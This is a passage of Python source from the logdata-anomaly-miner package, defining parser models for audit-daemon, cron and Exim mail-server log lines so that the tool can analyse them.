DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), pam_status_word_list, FixedDataModelElement("s10", b")'") ]), "USER_AUTH": SequenceModelElement("userauth", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b' msg=\'op=PAM:authentication acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s5", exe1), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), pam_status_word_list, FixedDataModelElement("s10", b"'") ]), "USER_AVC": AnyByteDataModelElement("user_avc"), "USER_CHAUTHTOK": AnyByteDataModelElement("user_chauthtok"), "USER_CMD": SequenceModelElement("user_cmd", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", b" msg='"), DelimitedDataModelElement("msg", b" "), FixedDataModelElement("s4", b' cmd="'), DelimitedDataModelElement("cmd", b'"'), FixedDataModelElement("s5", b"\" (terminal=pts/0"), FixedDataModelElement("s6", res), pam_status_word_list, FixedDataModelElement("s7", b")'"), ]), "USER_END": SequenceModelElement("userend", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s4", b' msg=\'PAM: session close acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s5", b'" :' + exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), pam_status_word_list, FixedDataModelElement("s10", b")'"), ]), "USER_ERR": SequenceModelElement("usererr", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", b' msg=\'PAM: bad_ident acct=? : exe="'), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s4", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s5", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s6", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s7", res), pam_status_word_list, FixedDataModelElement("s8", b")'") ]), "USER_LABELED_EXPORT": AnyByteDataModelElement("user_labeled_export"), "USER_LOGIN": SequenceModelElement("userlogin", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", b" msg='acct=\""), DelimitedDataModelElement("acct", b'"'), FixedDataModelElement("s4", b'":' + exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s5", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s6", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s7", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s8", res), pam_status_word_list, FixedDataModelElement("s9", b")'") ]), "USER_LOGOUT": AnyByteDataModelElement("user_logout"), "USER_MAC_POLICY_LOAD": AnyByteDataModelElement("user_mac_policy_load"), "USER_MGMT": AnyByteDataModelElement("user_mgmt"), "USER_ROLE_CHANGE": SequenceModelElement("user_role_change", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", subj), DelimitedDataModelElement("subj", b" "), FixedDataModelElement("s4", b" msg='pam: "), DelimitedDataModelElement("msg", b" "), FixedDataModelElement("s5", b" selected-context="), DelimitedDataModelElement("selected_context", b" "), FixedDataModelElement("s6", exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s7", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s8", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s9", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s10", res), pam_status_word_list, FixedDataModelElement("s11", b")'") ]), "USER_SELINUX_ERR": AnyByteDataModelElement("user_selinux_err"), "USER_START": SequenceModelElement("userstart", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", b' msg=\'PAM: session open acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s4", b'" :' + exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s5", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s6", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s7", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s8", res), pam_status_word_list, FixedDataModelElement("s9", b")'"), ]), "USER_TTY": AnyByteDataModelElement("user_tty"), "USER_UNLABELED_EXPORT": AnyByteDataModelElement("user_unlabeled_export"), "USYS_CONFIG": AnyByteDataModelElement("usys_config"), "VIRT_CONTROL": AnyByteDataModelElement("virt_control"), "VIRT_MACHINE_ID": AnyByteDataModelElement("virt_machine_id"), "VIRT_RESOURCE": AnyByteDataModelElement("virt_resource") } type_branches["SERVICE_STOP"] = type_branches["SERVICE_START"] model = SequenceModelElement("audispd", [ OptionalMatchModelElement("optional", FirstMatchModelElement("type", [ FixedDataModelElement("sname", b"audispd: "), FixedDataModelElement("sname_remote", b"audisp-remote: "), ])), FirstMatchModelElement("msg", [ ElementValueBranchModelElement("record", SequenceModelElement("preamble", [ FixedDataModelElement("s0", b"type="), WhiteSpaceLimitedDataModelElement("type"), FixedDataModelElement("s1", b" msg=audit("), DecimalIntegerValueModelElement("time"), FixedDataModelElement("s0", b"."), DecimalIntegerValueModelElement("ms", value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement("s1", b":"), DecimalIntegerValueModelElement("seq"), FixedDataModelElement("s2", b"):") ]), "type", type_branches, default_branch=None), FixedDataModelElement("queue-full", b"queue is full - dropping event") ]) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/CronParsingModel.py000066400000000000000000000046351500476301700322650ustar00rootroot00000000000000"""This module defines a parser for cron.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(user_name_model=None): """Return a model to parse a cron message logged via syslog after any standard logging preamble, e.g. from syslog.""" if user_name_model is None: user_name_model = VariableByteDataModelElement("user", b"0123456789abcdefghijklmnopqrstuvwxyz.-") type_children = [ SequenceModelElement("exec", [ FixedDataModelElement("s0", b"("), user_name_model, FixedDataModelElement("s1", b") CMD "), AnyByteDataModelElement("command") ]), SequenceModelElement("pam", [ FixedDataModelElement("s0", b"pam_unix(cron:session): session "), FixedWordlistDataModelElement("change", [b"opened", b"closed"]), FixedDataModelElement("s1", b" for user "), user_name_model, OptionalMatchModelElement("openby", FixedDataModelElement("default", b" by (uid=0)")) ]) ] model = FirstMatchModelElement("cron", [ SequenceModelElement("std", [ FixedDataModelElement("sname", b"CRON["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msgtype", type_children) ]), SequenceModelElement("low", [ FixedDataModelElement("sname", b"cron["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: (*system*"), DelimitedDataModelElement("rname", b") RELOAD ("), FixedDataModelElement("s1", b") RELOAD ("), DelimitedDataModelElement("fname", b")"), FixedDataModelElement("s2", b")"), ]) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/EximGenericParsingModel.py000066400000000000000000001140051500476301700335540ustar00rootroot00000000000000"""This module defines a generic parser model for exim.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement def get_model(): """Return a model to parse Exim logs from the AIT-LDS.""" alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]" size_str = b" SIZE=" host_str1 = b" host " host_str = b":" + host_str1 status_code421 = b": 421" status_code450 = b": 450 " status_code451 = b": 451 " status_code452 = b": 452 <" status_code550 = b": 550" status_code553 = b": 553 " status_code554 = b": 554 " dtme = DateTimeModelElement("time", b"%Y-%m-%d %H:%M:%S") msg_id = DelimitedDataModelElement("id", b" ") ip = IpAddressDataModelElement("ip") host_ip = IpAddressDataModelElement("host_ip") host = DelimitedDataModelElement("host", b" ") size = DecimalIntegerValueModelElement("size") port = DecimalIntegerValueModelElement("port") h_str = b" H=" h_str1 = b"H=" r_str = b" R=" t_str = b" T=" f_str = b" F=<" a_str = b" A=" u_str = b" U=" p_str = b" P=" s_str = b" S=" x_str = b" X=" c_str = b" C=\"" id_str = b" id=" a = DelimitedDataModelElement("a", b" ") r = DelimitedDataModelElement("r", b" ") t = DelimitedDataModelElement("t", b" ") u = DelimitedDataModelElement("u", b" ") p = DelimitedDataModelElement("p", b" ") h = DelimitedDataModelElement("h", b" ") x = DelimitedDataModelElement("x", b" ") c = DelimitedDataModelElement("c", b'"') s = DecimalIntegerValueModelElement("s") mail_from = DelimitedDataModelElement("mail_from", b" ") smtp_error_from_remote = b"SMTP error from remote mail server after MAIL FROM:<" model = FirstMatchModelElement("model", [ SequenceModelElement("date_seq", [ dtme, FixedDataModelElement("sp", b" "), FirstMatchModelElement("fm", [ SequenceModelElement("start", [ FixedDataModelElement("start", b"Start queue run: pid="), DecimalIntegerValueModelElement("pid"), ]), SequenceModelElement("end", [ FixedDataModelElement("end", b"End queue run: pid="), DecimalIntegerValueModelElement("pid"), ]), SequenceModelElement("no_host_found", [ FixedDataModelElement("no_host_found_str", b"no host name found for IP address "), ip, ]), SequenceModelElement("vrfy_failed", [ FixedDataModelElement("vrfy_failed_str", b"VRFY failed for "), DelimitedDataModelElement("mail", b" "), FixedDataModelElement("h_str", h_str), h, FixedDataModelElement("sp1", b" ["), ip, FixedDataModelElement("sp2", b"]") ]), SequenceModelElement("deferred", [ msg_id, FixedDataModelElement("smtp_error", b" SMTP error from remote mail server after MAIL FROM:<"), DelimitedDataModelElement("from_mail", b">"), FixedDataModelElement("s0", b">" + size_str), size, FixedDataModelElement("s1", host_str), host, FixedDataModelElement("s2", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code421 + b" "), # status code has always to be 421 in this error. DelimitedDataModelElement("version", b" "), FixedDataModelElement("s3", b" ["), DelimitedDataModelElement("domain", b"]"), FirstMatchModelElement("status", [ SequenceModelElement("temporary", [ FixedDataModelElement("s4", b"] Message from ("), IpAddressDataModelElement("from_ip"), FixedDataModelElement("s5", b") temporarily deferred - "), DelimitedDataModelElement("reason_code", b" "), FixedDataModelElement("s6", b" Please refer to "), VariableByteDataModelElement("refer_addr", alphabet) ]), SequenceModelElement("permanent", [ FixedDataModelElement("s4", b"] All messages from "), IpAddressDataModelElement("from_ip"), FixedDataModelElement("s5", b" will be permanently deferred; Retrying will NOT succeed. See "), VariableByteDataModelElement("refer_addr", alphabet) ]) ]), ]), SequenceModelElement("temporary_deferred_new", [ msg_id, FixedDataModelElement("s0", h_str), host, FixedDataModelElement("s1", b" ["), host_ip, FixedDataModelElement("s2", b"]:"), FixedDataModelElement("smtp_error", b" SMTP error from remote mail server after pipelined MAIL FROM:<"), DelimitedDataModelElement("from_mail", b">"), FixedDataModelElement("s3", b">" + size_str), size, FixedDataModelElement("status_code", status_code421 + b" "), # status code has to be 421 in this error message. DelimitedDataModelElement("version", b" "), FixedDataModelElement("s4", b" ["), DelimitedDataModelElement("domain", b"]"), FixedDataModelElement("s5", b"] Messages from "), IpAddressDataModelElement("from_ip"), FixedDataModelElement("s6", b" temporarily deferred due to unexpected volume or user complaints - "), DelimitedDataModelElement("reason_code", b" "), FixedDataModelElement("s7", b" see "), VariableByteDataModelElement("refer_addr", alphabet) ]), SequenceModelElement("rate_limited", [ msg_id, FixedDataModelElement("smtp_error", b" SMTP error from remote mail server after end of data" + host_str), host, FixedDataModelElement("s0", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code421 + b"-"), # status code has to be 421 in this error message. DelimitedDataModelElement("version", b" "), FixedDataModelElement("s1", b" ["), IpAddressDataModelElement("ip"), FixedDataModelElement("s2", b" "), DecimalIntegerValueModelElement("number"), FixedDataModelElement("msg", b"] Our system has detected an unusual rate of\\n421-"), DelimitedDataModelElement("version", b" "), FixedDataModelElement("msg", b" unsolicited mail originating from your IP address. To protect our\\n421-"), DelimitedDataModelElement("version", b" "), FixedDataModelElement("msg", b" users from spam, mail sent from your IP address has been temporarily\\n421-"), DelimitedDataModelElement("version", b" "), FixedDataModelElement("msg", b" rate limited. Please visit\\n421-"), DelimitedDataModelElement("version", b" ", consume_delimiter=True), DelimitedDataModelElement("website", b" "), FixedDataModelElement("msg", b" to review our Bulk\\n421 "), DelimitedDataModelElement("version", b" "), FixedDataModelElement("msg", b" Email Senders Guidelines. "), msg_id, FixedDataModelElement("gsmtp", b" - gsmtp") ]), SequenceModelElement("service_unavailable", [ msg_id, FixedDataModelElement("msg", b" SMTP error from remote mail server after RCPT TO:<"), DelimitedDataModelElement("mail_to", b">"), FixedDataModelElement("s0", b">" + host_str), host, FixedDataModelElement("s1", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code450), DelimitedDataModelElement("version", b" "), FixedDataModelElement("msg", b" Service unavailable") ]), SequenceModelElement("host_unable_to_send", [ msg_id, FixedDataModelElement("s0", b" == "), DelimitedDataModelElement("from_mail", b" "), FixedDataModelElement("s1", r_str), r, FixedDataModelElement("s2", t_str), t, FixedDataModelElement("msg", b" defer (-44): SMTP error from remote mail server after RCPT TO:<"), DelimitedDataModelElement("to_mail", b">"), FixedDataModelElement("s3", b">" + host_str), host, FixedDataModelElement("s4", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code451), FixedDataModelElement("msg", b"Temporary local problem - please try later") ]), SequenceModelElement("uncomplete_sender_verify", [ FixedDataModelElement("s0", h_str1), h, FixedDataModelElement("s1", b" ("), DelimitedDataModelElement("domain", b")"), FixedDataModelElement("s2", b") ["), IpAddressDataModelElement("ipv6", ipv6=True), FixedDataModelElement("s3", b"]:"), port, FirstMatchModelElement("reason", [ SequenceModelElement("permission_denied", [ FixedDataModelElement("msg", b" sender verify defer for <"), DelimitedDataModelElement("from_mail", b">"), FixedDataModelElement("msg", b">: require_files: error for "), DelimitedDataModelElement("required_file", b":"), FixedDataModelElement("msg", b": Permission denied") ]), SequenceModelElement("rejected_rcpt", [ FixedDataModelElement("s0", f_str), DelimitedDataModelElement("from", b">"), FixedDataModelElement("s1", b">" + a_str), DelimitedDataModelElement("a", b" "), FixedDataModelElement("msg", b" temporarily rejected RCPT <"), DelimitedDataModelElement("rcpt", b">"), FixedDataModelElement("msg", b">: Could not complete sender verify") ]) ]) ]), SequenceModelElement("domain_size_limit_exceeded", [ msg_id, FixedDataModelElement("s0", b" =="), DelimitedDataModelElement("mail_to", b" "), FixedDataModelElement("s1", r_str), r, FixedDataModelElement("s2", t_str), t, FixedDataModelElement("msg", b" defer (-44): SMTP error from remote mail server after RCPT TO:<"), DelimitedDataModelElement("mail_to", b">"), FixedDataModelElement("s3", b">" + host_str), host, FixedDataModelElement("s4", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code452), DelimitedDataModelElement("mail_to", b">"), FixedDataModelElement("msg", b"> Domain size limit exceeded") ]), SequenceModelElement("verification_error", [ msg_id, FixedDataModelElement("s0", b" ** "), DelimitedDataModelElement("mail_to", b" "), FixedDataModelElement("s1", r_str), r, FixedDataModelElement("s2", t_str), DelimitedDataModelElement("t", b":"), FirstMatchModelElement("fm", [ SequenceModelElement("verification_failed", [ FixedDataModelElement("msg", b": SMTP error from remote mail server after RCPT TO:<"), DelimitedDataModelElement("mail_to", b">"), FixedDataModelElement("s3", b">" + host_str), host, FixedDataModelElement("s4", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code550), FixedDataModelElement("msg", b"-Verification for <"), DelimitedDataModelElement("mail_from", b">"), FixedDataModelElement("msg", b">\\n550-The mail server could not deliver mail to "), DelimitedDataModelElement("mail_to", b" "), FixedDataModelElement("msg", b" The account or domain may not exist, they may be blacklisted, or missing the" b" proper dns entries.\\n550 Sender verify failed") ]), SequenceModelElement("unable_to_verify", [ FixedDataModelElement("msg", b": SMTP error from remote mail server after MAIL FROM:<"), DelimitedDataModelElement("mail_from", b">"), FixedDataModelElement("s3", b">" + size_str), size, FixedDataModelElement("s4", host_str), host, FixedDataModelElement("s5", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code553 + b"<"), DelimitedDataModelElement("mail_to", b">"), FixedDataModelElement("msg", b"> unable to verify address\\nVerify that SMPT authentication has been enabled.") ]) ]) ]), SequenceModelElement("mail_delivery_failure", [ msg_id, FixedDataModelElement("s0", b" <= <>" + r_str), r, FixedDataModelElement("s1", u_str), u, FixedDataModelElement("s2", p_str), p, FixedDataModelElement("s3", s_str), s, FixedDataModelElement("s4", t_str), FixedDataModelElement("t", b"\"Mail delivery failed: returning message to sender\""), FixedDataModelElement("s5", b" for "), VariableByteDataModelElement("mail_from", alphabet) ]), SequenceModelElement("mail_flagged_as_spam1", [ msg_id, FixedDataModelElement("s0", h_str), h, FixedDataModelElement("s1", b" ["), host_ip, FixedDataModelElement("s2", b"]:"), port, FixedDataModelElement("msg", b" Warning: \"SpamAssassin as marka22 detected message as spam ("), DelimitedDataModelElement("version", b")"), FixedDataModelElement("s3", b")\"") ]), SequenceModelElement("mail_flagged_as_spam2", [ msg_id, FixedDataModelElement("s0", b" <="), host_ip, FixedDataModelElement("s1", h_str), DelimitedDataModelElement("h", b"["), FixedDataModelElement("s2", b"["), host_ip, FixedDataModelElement("s3", b"]:"), port, FixedDataModelElement("s4", p_str), p, FixedDataModelElement("s5", s_str), s, FixedDataModelElement("s6", id_str), msg_id, FixedDataModelElement("s7", t_str), AnyByteDataModelElement("msg") ]), SequenceModelElement("mail_flagged_as_spam3", [ msg_id, FixedDataModelElement("s0", b" => "), DelimitedDataModelElement("user", b" "), DelimitedDataModelElement("s1", b"<", consume_delimiter=True), mail_from, FixedDataModelElement("s2", b" [>" + r_str), r, FixedDataModelElement("s3", t_str), AnyByteDataModelElement("t") ]), SequenceModelElement("mail_flagged_as_spam4", [ msg_id, FixedDataModelElement("msg", b" Completed"), OptionalMatchModelElement("opt", SequenceModelElement("seq", [ FixedDataModelElement("s0", b" "), dtme, FixedDataModelElement("s1", b" "), msg_id, FixedDataModelElement("s2", h_str), h, FixedDataModelElement("s3", b" ["), host_ip, FixedDataModelElement("s4", b"]:"), port, FixedDataModelElement("msg", b" Warning: \"SpamAssassin as marka22 detected message as spam ("), DelimitedDataModelElement("version", b")"), FixedDataModelElement("s5", b")\"") ])) ]), SequenceModelElement("mail_flagged_as_spam5", [ msg_id, FixedDataModelElement("s0", b" <= "), mail_from, FixedDataModelElement("s1", h_str), h, FixedDataModelElement("s2", b" ["), host_ip, FixedDataModelElement("s3", b"]:"), port, FixedDataModelElement("s4", p_str), p, FixedDataModelElement("s5", s_str), s, FixedDataModelElement("s6", id_str), msg_id, FixedDataModelElement("s7", t_str + b'"'), DelimitedDataModelElement("t", b"\""), FixedDataModelElement("s8", b'" for '), mail_from, FixedDataModelElement("s9", b" "), dtme, FixedDataModelElement("s10", b" "), msg_id, FixedDataModelElement("s11", b" => "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s12", b" <"), mail_from, FixedDataModelElement("s13", b" [>" + r_str), r, FixedDataModelElement("s14", t_str), AnyByteDataModelElement("t") ]), SequenceModelElement("mail_spam_allowed1", [ msg_id, FixedDataModelElement("s0", h_str), DelimitedDataModelElement("h", b"["), FixedDataModelElement("s1", b"["), host_ip, FixedDataModelElement("s2", b"]:"), port, FirstMatchModelElement("fm", [ FixedDataModelElement("msg", b" Warning: Message has been scanned: no virus or other harmful content was found"), SequenceModelElement("seq", [ FixedDataModelElement( "msg", b" Warning: \"SpamAssassin as cpaneleximscanner detected OUTGOING smtp message as NOT spam ("), DecimalFloatValueModelElement("spam_value", value_sign_type=DecimalFloatValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("s3", b")\"") ]) ]) ]), SequenceModelElement("mail_spam_allowed2", [ msg_id, FixedDataModelElement("s0", b" <= "), mail_from, FixedDataModelElement("s1", h_str), h, FixedDataModelElement("s2", b" ["), host_ip, FixedDataModelElement("s3", b"]:"), port, FixedDataModelElement("s4", p_str), p, FixedDataModelElement("s5", x_str), x, FixedDataModelElement("s6", a_str), a, FixedDataModelElement("s7", s_str), s, FixedDataModelElement("s8", t_str), t, FixedDataModelElement("msg", b" plates\" for "), AnyByteDataModelElement("mail_to") ]), SequenceModelElement("mail_spam_allowed3", [ msg_id, FixedDataModelElement("msg", b" SMTP connection outbound "), DecimalIntegerValueModelElement("timestamp"), FixedDataModelElement("s0", b" "), msg_id, FixedDataModelElement("s1", b" "), DelimitedDataModelElement("domain", b" "), FixedDataModelElement("s2", b" "), AnyByteDataModelElement("mail_to") ]), SequenceModelElement("mail_spam_allowed4", [ msg_id, FixedDataModelElement("s0", b" => "), mail_from, FixedDataModelElement("s1", r_str), r, FixedDataModelElement("s2", t_str), t, FixedDataModelElement("s3", h_str), h, FixedDataModelElement("s4", b" ["), host_ip, FixedDataModelElement("s5", b"]" + x_str), x, FixedDataModelElement("s6", c_str), c, FixedDataModelElement("s7", b"\" "), dtme, FixedDataModelElement("s8", b" "), msg_id, FixedDataModelElement("s9", b" Completed"), ]), SequenceModelElement("mail_flagged_as_spam1", [ msg_id, FixedDataModelElement("s0", h_str), h, FixedDataModelElement("s1", b" ["), host_ip, FixedDataModelElement("s2", b"]:"), port, FixedDataModelElement("msg", b" Warning: \"SpamAssassin as sfgthib detected message as spam ("), DelimitedDataModelElement("version", b")"), FixedDataModelElement("s3", b")\" "), dtme, FixedDataModelElement("s4", b" "), msg_id, FixedDataModelElement("s5", h_str), h, FixedDataModelElement("s6", b" ["), host_ip, FixedDataModelElement("s7", b"]:"), port, FixedDataModelElement("msg", b" Warning: Message has been scanned: no virus or other harmful content was found") ]), SequenceModelElement("mail_flagged_as_spam2", [ msg_id, FixedDataModelElement("s0", b" <= "), mail_from, FixedDataModelElement("s1", h_str), h, FixedDataModelElement("s2", b" ["), host_ip, FixedDataModelElement("s3", b"]:"), port, FixedDataModelElement("s4", p_str), p, FixedDataModelElement("s5", x_str), x, FixedDataModelElement("s6", s_str), s, FixedDataModelElement("s7", id_str), msg_id, FixedDataModelElement("s8", t_str), t, FixedDataModelElement("s9", b" for "), AnyByteDataModelElement("mail_to") ]), SequenceModelElement("mail", [ msg_id, FirstMatchModelElement("dir", [ SequenceModelElement("dir_in", [ FixedDataModelElement("in", b" <= "), FirstMatchModelElement("fm", [ SequenceModelElement("seq1", [ FixedDataModelElement("brack", b"<>"), FirstMatchModelElement("fm", [ SequenceModelElement("r", [ FixedDataModelElement("r_str", r_str), r, FixedDataModelElement("u_str", u_str), u, ]), SequenceModelElement("h", [ FixedDataModelElement("h_str", h_str), h, FixedDataModelElement("sp1", b" ["), ip, FixedDataModelElement("sp1", b"]"), ]) ]), FixedDataModelElement("sp2", p_str), p, FixedDataModelElement("sp2", p_str), s, ]), SequenceModelElement("seq2", [ DelimitedDataModelElement("mail", b" "), FixedDataModelElement("user_str", u_str), DelimitedDataModelElement("user", b" "), FixedDataModelElement("p_str", p_str), p, FixedDataModelElement("s_str", s_str), s, OptionalMatchModelElement( "id", SequenceModelElement("id", [ FixedDataModelElement("id_str", id_str), AnyByteDataModelElement("id") ]) ) ]) ]) ]), SequenceModelElement("dir_out", [ FixedDataModelElement("in", b" => "), DelimitedDataModelElement("name", b" "), FixedDataModelElement("sp1", b" "), OptionalMatchModelElement( "mail_opt", SequenceModelElement("mail", [ FixedDataModelElement("brack1", b"("), DelimitedDataModelElement("brack_mail", b")"), FixedDataModelElement("brack2", b") "), ])), FixedDataModelElement("sp2", b"<"), DelimitedDataModelElement("mail", b">"), FixedDataModelElement("r_str", b">" + r_str), r, FixedDataModelElement("t_str", t_str), VariableByteDataModelElement("t", alphabet), ]), SequenceModelElement("aster", [ FixedDataModelElement("aster", b" ** "), DelimitedDataModelElement("command", b" "), FixedDataModelElement("headers_str", b' Too many "Received" headers - suspected mail loop')]), FixedDataModelElement("completed", b" Completed"), FixedDataModelElement("frozen", b" Message is frozen"), FixedDataModelElement("frozen", b" Frozen (delivery error message)") ]) ]), ]) ]), SequenceModelElement("no_date_seq", [ FixedDataModelElement("s0", b"TO:<"), DelimitedDataModelElement("to_mail", b">"), FixedDataModelElement("s1", b">" + host_str), host, FixedDataModelElement("s2", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code450), # status code has to be 450 in this error message. DelimitedDataModelElement("version", b" "), FixedDataModelElement("msg", b" Client host rejected: cannot find your hostname, ["), host_ip, FixedDataModelElement("s3", b"] "), dtme, FixedDataModelElement("s4", b" "), msg_id, FixedDataModelElement("s5", b" ** "), DelimitedDataModelElement("to_mail", b">"), FixedDataModelElement("msg", b">: retry timeout exceeded") ]), SequenceModelElement("invalid_dns_record", [ FixedDataModelElement("msg", b"SMTP error from remote mail server after RCPT TO:" + host_str), DelimitedDataModelElement("host", b"["), FixedDataModelElement("s0", b"["), host_ip, FixedDataModelElement("status_code", b"]" + status_code550), FixedDataModelElement("msg", b"-Sender has no A, AAAA, or MX DNS records. "), DelimitedDataModelElement("host", b"\\"), FixedDataModelElement("s1", b"\\n550 l "), DelimitedDataModelElement("host", b"\\"), FixedDataModelElement("msg", b"\\nVerify the zone file in "), DelimitedDataModelElement("file", b" "), FixedDataModelElement("msg", b" for the correct information. If it appear correct, you can run named-checkzone " b"domain.com domain.com.db to verify if named is able to load the zone.") ]), SequenceModelElement("mail_rejected", [ FixedDataModelElement("msg", b"Diagnostic-Code: X-Postfix;" + host_str1), host, FixedDataModelElement("s0", b" ["), host_ip, FixedDataModelElement("status_code", b"] said" + status_code550 + b" "), DelimitedDataModelElement("version", b" "), FixedDataModelElement("msg", b" Message rejected due to content restrictions (in reply to end of DATA command)\\nWhen you see " b"an error such as 550 "), VariableByteDataModelElement("version", alphabet) ]), SequenceModelElement("mail_authentication_error", [ FixedDataModelElement("msg", b"Final-Recipient: rfc822;"), DelimitedDataModelElement("mail_from", b"\\"), FixedDataModelElement("msg", b"\\nAction: failed\\nStatus: "), DelimitedDataModelElement("status", b"\\"), FixedDataModelElement("msg", b"\\nDiagnostic-Code: smtp;550-Please turn on SMTP Authentication in your mail client.\\n550-"), host, FixedDataModelElement("s0", b" ["), host_ip, FixedDataModelElement("s1", b"]:"), port, FixedDataModelElement("msg", b" is not permitted to relay 550 through this server without authentication.") ]), SequenceModelElement("bad_helo_record", [ DelimitedDataModelElement("cipher_suite", b" "), FixedDataModelElement("msg", b" " + smtp_error_from_remote), DelimitedDataModelElement("mail_from", b">"), 